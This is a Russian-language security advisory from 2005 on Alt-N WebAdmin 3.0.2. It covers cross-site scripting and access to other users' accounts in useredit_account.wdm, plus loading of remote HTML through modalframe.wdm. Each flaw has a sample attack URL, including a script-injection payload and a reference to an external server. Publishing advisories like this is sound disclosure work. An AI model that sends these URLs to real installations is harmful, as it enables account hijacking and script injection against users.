Дата публикации: | 31.01.2005 |
Всего просмотров: | 1310 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: WebAdmin 3.0.2 и более ранние версии
Описание: Alt-N WebAdmin – это утилита для удаленного управления такими программами как MDaemon, RelayFax, и WorldClient. Уязвимость обнаружена в сценарии 'useredit_account.wdm' из-за некорректной обработки параметра ‘user’. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример: http://[target]/WebAdmin/useredit_account.wdm? user=%3Cscript%3Ealert('test')%3C/script%3E Удаленный авторизованный пользователь может вызвать сценарий 'useredit_account.wdm' и получить доступ к учетным записям других пользователей. Пример: http://[target]/WebAdmin/useredit_account.wdm?user=otheruser@domain Удаленный пользователь может загрузить и выполнить произвольный HTML код в браузере целевого пользователя. Пример: http://[target]/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm URL производителя: http://www.altn.com/products/default.asp? product%5Fid=WebAdmin Решение: Установите обновление |
|
Ссылки: | WebAdmin useredit_account.wdm Permits Cross-Site Scripting Attacks and Lets Remote Authenticated Users Access Other Account |